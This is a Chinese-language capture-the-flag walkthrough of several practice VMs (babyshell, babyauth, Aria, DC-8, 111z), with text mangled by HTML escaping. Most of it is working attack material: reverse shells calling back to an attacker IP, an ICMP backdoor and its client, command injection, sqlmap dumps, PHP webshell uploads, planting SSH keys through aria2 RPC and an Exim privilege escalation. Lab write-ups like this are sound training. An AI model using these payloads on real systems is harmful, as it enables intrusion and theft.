Sorry, user admin may not run sudo on BabyPass<\/pre>\n\n\n\n
\u7136\u540e\u67e5\u770b\/var\/www\/html\/tms\/includes\/config.php\u6587\u4ef6<\/p>\n\n\n\n
define('DB_HOST','localhost');
define('DB_USER','tms_user');
define('DB_PASS','secure_password');
define('DB_NAME','tms');
\/\/ Establish database connection.<\/pre>\n\n\n\n
mysql -utms_user -psecure_password
mysql\u8fde\u63a5\u4e00\u4e0b
\u67e5\u770btms\u90a3\u4e2a\u5e93\uff0c\u63a5\u7740\u67e5\u770b\u4e0b\u9762\u7684\u8868
| Tables_in_tms   |
+-----------------+
| admin           |
| tblbooking      |
| tblenquiry      |
| tblissues       |
| tblpages        |
| tbltourpackages |
| tblusers        |
+-----------------+<\/pre>\n\n\n\n
|  1 | Manju Srivatav | 4456464654   | manju@gmail.com  | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:33:20 | NULL                |
|  2 | Kishan         | 9871987979   | kishan@gmail.com | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:33:56 | NULL                |
|  3 | Salvi Chandra  | 1398756416   | salvi@gmail.com  | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:34:20 | NULL                |
|  4 | Abir           | 4789756456   | abir@gmail.com   | 202cb962ac59075b964b07152d234b70 | 2020-07-08 02:34:38 | NULL                |
|  5 | Test           | 1987894654   | anuj@gmail.com   | f925916e2754e5e03f75dd58a5733251 | 2020-07-08 02:35:06 | 2021-05-11 00:37:41 |
|  6 | root           | 123456789    | root@gmail.com   | fd50619cd7026f0f32272f77f4da6e92<\/pre>\n\n\n\n
https:\/\/toolshu.com\/crackmd5  https:\/\/hashes.com\/zh\/decrypt\/hash https:\/\/somd5.com md5\u89e3\u5bc6\u7f51\u7ad9
fd50619cd7026f0f32272f77f4da6e92 -> Root@456<\/pre>\n\n\n\n
babyshell<\/h3>\n\n\n\n
fscan\u626b\u4e00\u4e0b\u9776\u673a\u53d1\u73b080\u548c22\u7aef\u53e3
dir\u626b\u4e00\u4e0b\u53d1\u73b0backup.zip \uff0c\u89e3\u538b\u53d1\u73b0icmp.py
#!\/usr\/bin\/env python3
import os
import sys
import socket
import struct
import time
import subprocess
import signal
import threading
from scapy.all import ICMP, IP, Raw, send, sniff, Ether
import base64

TRIGGER_SEQUENCE = b\"Mazesec\"
LISTEN_INTERFACE = \"enp0s3\"
SERVER_IP = \"0.0.0.0\"


class ICMPServer:
    def __init__(self):
        self.running = True
        self.client_ips = {}

    def signal_handler(self, sig, frame):
        print(\"\\n[!] Stopping server...\")
        self.running = False
        sys.exit(0)

    def execute_command_as_user(self, command, uid=1000, timeout=30):

    def parse_icmp_command(self, packet_data):
        try:
            trigger_len = len(TRIGGER_SEQUENCE)
            if len(packet_data) < trigger_len + 4:
                return None

            if packet_data[:trigger_len] != TRIGGER_SEQUENCE:
                return None

            cmd_len = struct.unpack('>I', packet_data[trigger_len:trigger_len + 4])[0]

            if cmd_len <= 0 or cmd_len > 4096:
                return None

            if len(packet_data) < trigger_len + 4 + cmd_len:
                return None

            command = packet_data[trigger_len + 4:trigger_len + 4 + cmd_len].decode('utf-8', errors='ignore')
            return command

        except Exception as e:
            print(f\"[-] Parse error: {e}\")
            return None

    def create_icmp_response(self, original_packet, result):
        try:
            result_bytes = result.encode('utf-8') if isinstance(result, str) else result
            result_len = len(result_bytes)
            trigger_len = len(TRIGGER_SEQUENCE)

            payload = TRIGGER_SEQUENCE
            payload += struct.pack('>I', result_len)
            payload += result_bytes

            response = IP(dst=original_packet[IP].src) \/ \\
                       ICMP(type=0, id=original_packet[ICMP].id, seq=original_packet[ICMP].seq) \/ \\
                       Raw(load=payload)

            return response

        except Exception as e:
            print(f\"[-] Response creation error: {e}\")
            return None

    def handle_icmp_packet(self, packet):
        if not self.running:
            return

        try:
            if packet.haslayer(ICMP) and packet[ICMP].type == 8:
                src_ip = packet[IP].src

                if packet.haslayer(Raw):
                    icmp_data = bytes(packet[Raw].load)

                    command = self.parse_icmp_command(icmp_data)

                    if command:
                        print(f\"[+] Command from {src_ip}: {command}\")

                        # \u4ee5UID 1000\u6267\u884c\u547d\u4ee4
                        result = self.execute_command_as_user(command, 1000)
                        print(f\"[+] Result length: {len(result)}\")

                        # \u4ee5root\u6743\u9650\u53d1\u9001ICMP\u54cd\u5e94
                        response = self.create_icmp_response(packet, result)
                        if response:
                            send(response, verbose=0)
                            print(f\"[+] Response sent to {src_ip}\")

                        self.client_ips[src_ip] = time.time()

        except Exception as e:
            print(f\"[-] Packet handling error: {e}\")

    def start_server(self):

        signal.signal(signal.SIGINT, self.signal_handler)
        signal.signal(signal.SIGTERM, self.signal_handler)


def main():
    server = ICMPServer()
    server.start_server()


if __name__ == \"__main__\":
    main()<\/pre>\n\n\n\n
\u62f7\u6253ai\u5f97\u51fa\u811a\u672c
#!\/usr\/bin\/env python3
# icmp_client.py
import struct
import time
from scapy.all import IP, ICMP, Raw, send, sniff

TRIGGER = b\"Mazesec\"
TARGET = \"192.168.3.183\"   # <-- \u6539\u4e3a\u76ee\u6807 IP
TIMEOUT = 5

def make_payload(cmd: str) -> bytes:
    b = cmd.encode('utf-8')
    return TRIGGER + struct.pack('>I', len(b)) + b

def send_command_and_wait(target_ip: str, cmd: str, timeout: int = TIMEOUT):
    payload = make_payload(cmd)
    pkt = IP(dst=target_ip) \/ ICMP(type=8, id=0x1234, seq=0x1) \/ Raw(load=payload)
    send(pkt, verbose=0)
    # \u76d1\u542c\u76ee\u6807\u53d1\u56de\u7684 ICMP Echo Reply\uff08type 0\uff09\u5e76\u4ee5 TRIGGER \u5f00\u5934\u7684\u5305
    def filter_fn(x):
        try:
            return x.haslayer(ICMP) and x[ICMP].type == 0 and x[IP].src == target_ip and x.haslayer(Raw) and bytes(x[Raw].load).startswith(TRIGGER)
        except Exception:
            return False

    pkts = sniff(lfilter=filter_fn, timeout=timeout, count=1)
    if not pkts:
        print(\"[!] No reply\")
        return None
    load = bytes(pkts[0][Raw].load)
    # parse: skip TRIGGER, read 4-byte length, then data
    try:
        off = len(TRIGGER)
        out_len = struct.unpack('>I', load[off:off+4])[0]
        data = load[off+4:off+4+out_len]
        return data.decode('utf-8', errors='ignore')
    except Exception as e:
        print(\"[!] Parse error:\", e)
        return None

if __name__ == \"__main__\":
    import sys
    if len(sys.argv) < 3:
        print(\"Usage: sudo python icmp_client.py <target_ip> <command>\")
        sys.exit(1)
    tgt = sys.argv[1]
    cmd = \" \".join(sys.argv[2:])
    print(f\"[+] Sending command to {tgt}: {cmd}\")
    out = send_command_and_wait(tgt, cmd, timeout=8)
    if out is None:
        print(\"[!] No response or parse failure\")
    else:
        print(\"----- RESPONSE BEGIN -----\")
        print(out)
        print(\"----- RESPONSE END -----\")<\/pre>\n\n\n\n
sudo python3 icmp_client.py 192.168.3.183 \"whoami\"
\u56de\u663eid\u4e3a: zero\uff0c\u4e0d\u8fc7\u8001\u662f\u65ad\u5f00\u4ec0\u4e48\u7684\uff0c\u6709\u65f6\u5019\u547d\u4ee4run\u4e0d\u4e86\uff0c\u5c1d\u8bd5\u53cd\u5f39shell
sudo python3 icmp_client.py 192.168.3.183 \"busybox nc 192.168.3.236 4444 -e \/bin\/sh\"
[+] Sending command to 192.168.3.183: busybox nc 192.168.3.236 4444 -e \/bin\/sh
[!] No reply
[!] No response or parse failure
\u53d1\u73b0\u786e\u5b9e\u62a5\u9519\u4e0d\u8fc7\u4e5f\u786e\u5b9e\u53cd\u5f39\u6210\u529f\u4e86\ud83e\udd21<\/pre>\n\n\n\n
nc -lvvp 4444
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
\u76f4\u63a5\u8bfb\/home\/zero\/user.txt
\u4f7f\u7528\u4e0a\u9762\u7684\u6743\u9650\u7ef4\u6301\u65b9\u6cd5\uff1a
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null
\u8fdb\u5165\u4ea4\u4e92\u9875\u9762\u67e5\u770b\u5b8c\u6574\u7684py
cat icmp.py
![vmware_CFf9ubKoLM](HackmyVm-babyshell\/2025-11\/vmware_CFf9ubKoLM.png)
def execute_command_as_user(self, command, uid=1000, timeout=30):
try:
# \u4f7f\u7528sudo\u4ee5\u6307\u5b9a\u7528\u6237\u6267\u884c\u547d\u4ee4
result = subprocess.check_output(
f\"sudo -u zero bash -c '{command}'\",
shell=True,
stderr=subprocess.STDOUT,
timeout=timeout,
text=True
)
return result
except subprocess.TimeoutExpired:
return f\"Error: Command timeout\"
except subprocess.CalledProcessError as e:
return f\"Error: Exit code {e.returncode}\\nOutput: {e.output}\"
except Exception as e:
return f\"Error: {str(e)}\"\/\/(\u5c31\u653e\u6bd4\u8f83\u91cd\u8981\u7684\u4e86)
\u53d1\u73b0\u547d\u4ee4\u53ef\u4ee5\u62fc\u63a5\u6267\u884c\u5e76\u4e14\u662fsudo
\u76f4\u63a5
sudo python3 icmp_client.py 192.168.3.183 \"';bash -c 'bash -i >&\/dev\/tcp\/192.168.3.236\/2333 0>&1''\"<\/pre>\n\n\n\n
nc -lvvp 2333
listening on [any] 2333 ...
192.168.3.183: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.183] 44174
bash: cannot set terminal process group (356): Inappropriate ioctl for device
bash: no job control in this shell
root@BabyShell:\/# \/\/\u62ff\u4e0broot<\/pre>\n\n\n\n
babyauth<\/h3>\n\n\n\n
\u6253\u5f00\u8be5\u9776\u673a\uff0c\u5148fscan\u626b\u4e00\u4e0b\uff0cdirsearch\u626b\u4e00\u4e0b<\/p>\n\n\n\n
\u53d1\u73b0\u4e00\u4e2a\u767b\u5f55\u6846\uff1ahttp:\/\/192.168.3.237\/login.php
\u767b\u5f55\u6846\u6709\uff1asql\u6ce8\u5165\u6f0f\u6d1e,xss\u4ec0\u4e48\u7684\u4e00\u4e9b\u6f0f\u6d1e\uff0c\u56e0\u4e3adir\u5c31\u626b\u51fa\u6765\u8fd9\u4e00\u4e2a\uff0c\u8bd5\u8bd5\u7206\u7834\u767b\u5f55\u548c\u6f0f\u6d1e\u6d4b\u8bd5\uff0c\u7136\u540e\u53d1\u73b0\u7206\u7834\u6210\u529f
admin\/iloveyou
http:\/\/192.168.3.237\/admin.php?search=1
http:\/\/192.168.3.237\/admin.php?search=1%27+or+1%3D1%23 \/\/1' or 1=1#
\u53d1\u73b0\u5b58\u5728sql\u6ce8\u5165\u6f0f\u6d1e\uff0c\u4f7f\u7528sqlmap\u5de5\u5177\u76f4\u63a5\u626b\uff1a
 python sqlmap.py -u \"http:\/\/192.168.3.237:80\/admin.php?search=1%27+or+1%3D1%23\" --dbs --cookie=\"PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo\"
 available databases [2]:
[*] information_schema
[*] target_db

-u \"http:\/\/192.168.3.237:80\/admin.php?search=1%27+or+1%3D1%23\" -D target_db --tables --cookie=\"PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo\"
Database: target_db
[3 tables]
+---------+
| path    |
| credit  |
| product |
+---------+

-u \"http:\/\/192.168.3.237:80\/admin.php?search=1%27+or+1%3D1%23\" -D target_db -T credit --schema --cookie=\"PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo\"
Database: target_db
Table: path
[1 column]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| secret_path | varchar(255) |
+-------------+--------------+

Database: target_db
Table: credit
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
| username | varchar(50) |
+----------+-------------+
Table: credit
[1 entry]
+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| ff5e66b76340c5636aa40e7c6a46628f | lingmj |
+----------------------------------+----------+
ff5e66b76340c5636aa40e7c6a46628f -md5> xiaomi\uff08\u4e0d\u8fc7\u5c31\u662f\u4f7f\u7528\u8fd9\u4e2a\u767b\u5f55\u4e0d\u4e0a\u53bb\uff09


\u53cd\u6b63\u5c31\u662f\u4e00\u7cfb\u5217\u7684\u626b
Table: path
+-----------------------------------+
| secret_path |
+-----------------------------------+
| \/var\/www\/html\/SsssssssuperSecret\/ |
+-----------------------------------+
\u53d1\u73b0\u8fd9\u4e2a\u76ee\u5f55http:\/\/192.168.3.237\/SsssssssuperSecret\/ \u518ddir\u4e00\u4e0b\u53d1\u73b0\u4e1c\u897f:user.txt shell.php \/index.html
\u8fdb\u5165shell.php \u8fd9\u4e2a\u662f\u4e00\u4e2a\u6a21\u62df\u7ec8\u7aef
busybox nc 192.168.3.236 4444 -e \/bin\/bash<\/pre>\n\n\n\n
nc -lvvp 4444     
listening on [any] 4444 ...
id
192.168.3.237: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.237] 54840
uid=33(www-data) gid=33(www-data) groups=33(www-data)
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null \/\/\u7a33\u5b9ashell \u62ff\u4e0buser\u6743\u9650
\u5c1d\u8bd5su -root
\u53d1\u73b0\u9700\u8981Verification code:
\u63a5\u7740\u67e5\u770b\/opt\u76ee\u5f55\u4e0b\u9762\uff0c\u68c0\u67e5\u662f\u4e0d\u662f\u5b58\u653e\u5b9a\u5236\u5de5\u5177\u3001\u914d\u7f6e\u6587\u4ef6\u6216\u6f0f\u6d1e\u76f8\u5173\u7a0b\u5e8f\uff08\u5982\u63d0\u6743\u811a\u672c\u3001\u670d\u52a1\u914d\u7f6e\uff09
\u5728\u7cfb\u7edf\u4e2d\u53d1\u73b0 Google Authenticator \u914d\u7f6e\u6587\u4ef6\uff1a
ls -al \/opt
ls -al \/opt
total 12
drwxr-xr-x  2 root root 4096 Nov  6 06:43 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
-r--r--r--  1 root root  141 Nov  6 06:43 .google_authenticator
cat \/opt\/.goo*
WETZMYJW52CMYLCZIX4EJ4HACQ
\" RATE_LIMIT 3 30 1762429231 1762429249
\" WINDOW_SIZE 17
\" TOTP_AUTH
66503223
88483022
74570865
29377535
29891329
\u83b7\u53d6 TOTP \u5bc6\u94a5\uff1aWETZMYJW52CMYLCZIX4EJ4HACQ
\u4f7f\u7528 oathtool \u751f\u6210\u6709\u6548\u7684\u9a8c\u8bc1\u7801\uff1aoathtool -b --totp \"WETZMYJW52CMYLCZIX4EJ4HACQ\"  -> 549616
\u8f93\u5165code \u5bc6\u7801\u5c31\u662fxiaomi \u62ff\u4e0broot\u6743\u9650<\/pre>\n\n\n\n
Aria<\/h2>\n\n\n\n
fscan\u626b\u63cf\u52a0nmap
sudo nmap -Pn -p- -sT 192.168.3.83
.\/fscan -h 192.168.3.83
\u53d1\u73b0
22\/tcp   open  ssh
80\/tcp   open  http
1337\/tcp open  waste
\u8bbf\u95ee80\u7aef\u53e3\uff0c\u5e76\u4e14nc\u8fde\u63a51337<\/pre>\n\n\n\n
\u2514\u2500# nc 192.168.3.83 1337
--- Aria Internal Service Debug Shell ---
--- To exit, type 'exit' ---

--- Recent Upload Paths ---
Log file not found.
--- End of Log ---<\/pre>\n\n\n\n
\u8bbf\u95ee80\u7aef\u53e3\u5e76\u4e14dir\u626b\u63cf\u53d1\u73b0upload.php\uff0c\u6587\u4ef6\u4e0a\u4f20
GIF89a
<?= exec($_GET['0']); ?>
\u7136\u540e\u518d\u6b21nc\u8fde\u63a5
\u2514\u2500# nc 192.168.3.83 1337
--- Aria Internal Service Debug Shell ---
--- To exit, type 'exit' ---

--- Recent Upload Paths ---
Sun 16 Nov 2025 04:12:57 AM EST: New file created: \/var\/www\/html\/uploads\/756dfdd36d83c0bf213fb615014f6b2b.gif
\u8bbf\u95ee\u8be5\u7f51\u7ad9\uff0c\u53d1\u73b0\u8fde\u4e0a\u6210\u529f
?0=busybox nc 192.168.56.247 9427 -e \/bin\/bash \/\/\u53cd\u5f39shell
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null\/\/\u6743\u9650\u7ef4\u6301<\/pre>\n\n\n\n
cat -A \/home\/aria\/user.txt
flag{user-d13adadc6bbc1391394a5198cba2d1d7}$
M-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^L<\/pre>\n\n\n\n
\u53d1\u73b0\u662f\u96f6\u5bbd\u5ea6 \/ \u63a7\u5236\u5b57\u7b26
\u63a5\u628aflag\u548c\u4e0d\u53ef\u89c1\u5b57\u7b26\u653e\u5165\u89e3\u5bc6\u7f51\u7ad9\uff0c\u5f97\u5230token token: maze-sec
\u626b\u63cf\u4e00\u4e0b\u7aef\u53e3ss -lntp
LISTEN         0              128                        127.0.0.1:6800                      0.0.0.0:*
www-data@Aria:\/var\/www\/html\/uploads$ ps aux | grep aria
root         337  0.0  0.1  56660  2644 ?        Ss   04:00   0:03 \/usr\/bin\/aria2c --conf-path=\/root\/.aria2\/aria2.conf
\u53d1\u73b0\u662froot\u7528\u6237\u6253\u5f00\u7684\uff0c\u6d4b\u8bd5\u4e00\u4e0b\u6f0f\u6d1e\u7aef\u53e3\u662f\u4e0d\u662f\u5b58\u5728
www-data@Aria:\/var\/www\/html\/uploads$ curl -s http:\/\/127.0.0.1:6800\/jsonrpc \\
> -H 'Content-Type: application\/json' \\
> -d '{\"jsonrpc\":\"2.0\",\"method\":\"aria2.getVersion\",\"id\":\"Q1\"}'
{\"id\":\"Q1\",\"jsonrpc\":\"2.0\",\"error\":{\"code\":1,\"message\":\"Unauthorized\"}}
\u5f97\u5230Unauthorized\uff0c\u8bf4\u660e\u6709\u8ba4\u8bc1\uff0c\u4f7f\u7528user.txt\u62ff\u5230\u7684token
www-data@Aria:\/var\/www\/html\/uploads$ curl -s http:\/\/127.0.0.1:6800\/jsonrpc \\
> -H 'Content-Type: application\/json' \\
> -d '{\"jsonrpc\":\"2.0\",\"method\":\"aria2.getVersion\",\"id\":\"Q1\",\"params\":[\"token:maze-sec\"]}'
{\"id\":\"Q1\",\"jsonrpc\":\"2.0\",\"result\":{\"enabledFeatures\":[\"Async DNS\",\"BitTorrent\",\"Firefox3 Cookie\",\"GZip\",\"HTTPS\",\"Message Digest\",\"Metalink\",\"XML-RPC\",\"SFTP\"],\"version\":\"1.35.0\"}}
\u6210\u529f\u8fd4\u56de\u7248\u672c\u4fe1\u606f\uff0c\u6f0f\u6d1e\u5b58\u5728<\/pre>\n\n\n\n
\u653b\u51fb\u673a\u4e0a\u5f00\u542fhttp\u670d\u52a1\uff0c\u5e76\u628a\u81ea\u5df1\u7684\u516c\u94a5\u4fdd\u5b58\u5230authorized_keys<\/code> \u6587\u4ef6\u4e2d<\/p>\n\n\n\n
\u250c\u2500\u2500(root\u327fkali)-[~]
\u2514\u2500# python -m http.server 8080                                                  
Serving HTTP on 0.0.0.0 port 8080 (http:\/\/0.0.0.0:8080\/) ...<\/pre>\n\n\n\n
www-data@Aria:\/var\/www\/html\/uploads$
curl -s http:\/\/127.0.0.1:6800\/jsonrpc \\
 -H 'Content-Type: application\/json' \\
 -d '{
         \"jsonrpc\":\"2.0\",
         \"method\":\"aria2.addUri\",
         \"id\":\"Q1\",
         \"params\":[
           \"token:maze-sec\",
           [\"http:\/\/192.168.3.236:8080\/authorized_keys\"],
           {\"dir\":\"\/root\/.ssh\/\", \"out\":\"authorized_keys\"}
         ]
 }'<\/pre>\n\n\n\n
ssh\u8fde\u63a5\u53d1\u73b0\u83b7\u5f97root\u6743\u9650<\/pre>\n\n\n\n
DC-8<\/h2>\n\n\n\n
\u626b\u63cf\u7aef\u53e3\u53d1\u73b0\u8fd8\u662f22\u548c80\u7aef\u53e3\uff0c\u70b9\u51fb\u7f51\u7ad9\u65c1\u8fb9\u7684\u6846<\/p>\n\n\n\n
?uid=1  \u8f93\u5165uid=1' \u53d1\u73b0\u62a5\u9519 \u5e94\u8be5\u662fsql\u6ce8\u5165 sqlmap\u6ce8\u5165\u76f4\u63a5\u6253<\/pre>\n\n\n\n
-D d7db -T users -C name,pass --dump<\/pre>\n\n\n\n
\u53d1\u73b0\u8d26\u53f7\u548c\u5bc6\u7801
name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku\/3if\/oRVZJaz5mKC2vF<\/pre>\n\n\n\n
\u63d0\u793a\u4f7f\u7528john\u7206\u7834\u5bc6\u7801<\/pre>\n\n\n\n
\u51fa\u6765
john
turtle<\/pre>\n\n\n\n
dirsearch\u626b\u4e00\u4e0b\u76ee\u5f55\uff1a\/robots.txt \/user\/login \u767b\u5f55\u4e00\u4e0bjohn\/turtle<\/pre>\n\n\n\n
\u6210\u529f\u767b\u5f55\uff0c\uff0c\u7136\u540e\u6bcf\u4e2a\u5730\u65b9\u70b9\u70b9->\u5728\u7f51\u7ad9 Contact Us \u91cc\u9762\u53d1\u73b0\u4e00\u4e2a\u9875\u9762 Web Form -> Form settings<\/pre>\n\n\n\n
\u53d1\u73b0PHP code \u5199\u5165\u53cd\u5f39shell
<p>wea5e1<\/p>
<?php
system(\"bash -c 'bash -i >& \/dev\/tcp\/192.168.3.236\/4444 0>&1'\");
?><\/pre>\n\n\n\n
nc \u76d1\u542c
nc -lvvp 4444
192.168.3.1: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.1] 37894
bash: cannot set terminal process group (372): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-8:\/var\/www\/html$<\/pre>\n\n\n\n
\u67e5\u770b\u4e00\u4e0b\u6743\u9650
find \/ -perm \/4000 -type f -exec ls -ld {} \\; 2>\/dev\/null
\u53d1\u73b0 \/usr\/sbin\/exim4<\/pre>\n\n\n\n
\/usr\/sbin\/exim4 --version<\/pre>\n\n\n\n
searchsploit exim<\/pre>\n\n\n\n
4.87-4.91 Exim 4.87 - 4.91 - Local Privilege Escalation           | linux\/local\/46996.sh<\/pre>\n\n\n\n
\u8bb0\u5f97\uff1a\u5148\u5728\u90a3\u4e2a\u7f51\u7ad9cd \/tmp
searchsploit -m linux\/local\/46996.sh
wget http:\/\/192.168.3.236:4444\/46996.sh<\/pre>\n\n\n\n
www-data@dc-8:\/tmp$ wget http:\/\/192.168.3.236:8000\/46996.sh
wget http:\/\/192.168.3.236:8000\/46996.sh
--2025-11-19 22:54:49--  http:\/\/192.168.3.236:8000\/46996.sh
Connecting to 192.168.3.236:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text\/x-sh]
Saving to: '46996.sh'

46996.sh            100%[===================>]   3.47K  --.-KB\/s    in 0.001s  

2025-11-19 22:54:49 (2.68 MB\/s) - '46996.sh' saved [3552\/3552]<\/pre>\n\n\n\n
chmod +x 46996.sh
.\/46996.sh -m netcat<\/pre>\n\n\n\n
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim) \u62ff\u4e0broot<\/pre>\n\n\n\n
111z<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
\u6253\u5f00\u9776\u673a<\/p>\n\n\n\n
sudo arp-scan -I eth1 192.168.3.0\/24 \/\/\u53d1\u73b0192.128.3.128\u4e3b\u673a
nmap -p- -sT 192.168.3.128
.\/fscan -h 192.168.3.128 \/\/\u53ea\u53d1\u73b022\u7aef\u53e3\u548c80\u7aef\u53e3
dirsearch 192.168.3.128 (\u4e09\u4ef6\u5957) \u53d1\u73b0uploads<\/pre>\n\n\n\n
curl 192.128.3.128<\/pre>\n\n\n\n
\u8bbf\u95ee\u7f51\u7ad9\uff0c\u53d1\u73b0\u662f\u5173\u4e8e\u6587\u4ef6\u4e0a\u4f20\u7684\u9776\u673a \u6d4b\u8bd5\u53d1\u73b0\u6709\u5f88\u591a\u7684\u51fd\u6570\u88abban\uff0c\u4f8b\u5982eval system ; \u4ec0\u4e48\u7684<\/pre>\n\n\n\n
\u4e0d\u8fc7\u7531\u4e8ephp\u5f88\u591a\u7279\u6027\uff0c\u4f8b\u5982php\u5141\u8bb8\u4f7f\u7528 ?> \u76f4\u63a5\u6700\u540e\u4e00\u4e2aphp\u8bed\u53e5\u4e0d\u4f7f\u7528\u5206\u53f7\u7ed3\u675f\uff0c\u5e76\u4e14\u662f\u4e0d\u533a\u5206\u5927\u5c0f\u5199\u7684<\/pre>\n\n\n\n
\u65b9\u6848\u4e00<\/h4>\n\n\n\n
<?php evAl($_POST[1])?> \/\/<\/pre>\n\n\n\n
POST \/upload.php HTTP\/1.1
Host: 192.168.3.128
Content-Length: 599
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/140.0.0.0 Safari\/537.36
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundarys8mDFzHGXbyy6bNh
Accept: *\/*
Origin: http:\/\/192.168.3.128
Referer: http:\/\/192.168.3.128\/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
\u200b
------WebKitFormBoundarys8mDFzHGXbyy6bNh
Content-Disposition: form-data; name=\"file\"; filename=\"3.php\"
Content-Type: image\/png
\u200b
<?php evAl($_POST[1])?> <\/pre>\n\n\n\n
{\"success\":true,\"error\":null,\"filepath\":\"691ef2afe8042.php\"}<\/pre>\n\n\n\n
\u7136\u540e\u53d1\u73b0\u4f60\u662f\u6267\u884c\u4e0d\u4e86\u7684\uff0c\u4e0d\u8fc7\u547d\u4ee4\u6267\u884c\u51fd\u6570\u88ab\u7981\u7528\u4e0d\u5f71\u54cd\u6587\u4ef6\u8bfb\u53d6\u4ee5\u53ca\u76ee\u5f55\u626b\u63cf\u7b49\u529f\u80fd\uff0c\u4f7f\u7528\u8681\u5251\u76f4\u63a5\u4f9d\u6b21\u67e5\u770b\u76ee\u5f55\u53ca\u6587\u4ef6\u5185\u5bb9\uff0c\u53ef\u4ee5\u53d1\u73b0 llpass.txt \u91cc\u5b58\u653e\u7684ll\u7528\u6237 ssh \u5bc6\u7801<\/p>\n\n\n\n
\u65b9\u6848\u4e8c<\/h4>\n\n\n\n
\u65e2\u7136\u4e0d\u80fd\u6267\u884c\u547d\u4ee4\uff0c\u90a3\u5c31\u4ec5\u9760webshell\u626b\u63cf\u6307\u5b9a\u76ee\u5f55\u3001\u8bfb\u53d6\u654f\u611f\u6587\u4ef6\uff0c\u6536\u96c6\u4fe1\u606f\u3002<\/p>\n\n\n\n
<?php $dir=$_GET[1]?>
<?php $file=$_GET[2]?>
<?php echo '<pre>'?>
<?php print_r(scandir($dir))?>
<?php echo '<\/pre>'?>
<?php highlight_file($file)?><\/pre>\n\n\n\n
Array
(
    [0] => .
    [1] => ..
    [2] => bin
    [3] => boot
    [4] => dev
    [5] => etc
    [6] => home
    [7] => initrd.img
    [8] => initrd.img.old
    [9] => lib
    [10] => lib32
    [11] => lib64
    [12] => libx32
    [13] => lost+found
    [14] => media
    [15] => mnt
    [16] => opt
    [17] => proc
    [18] => root
    [19] => run
    [20] => sbin
    [21] => srv
    [22] => sys
    [23] => tmp
    [24] => usr
    [25] => var
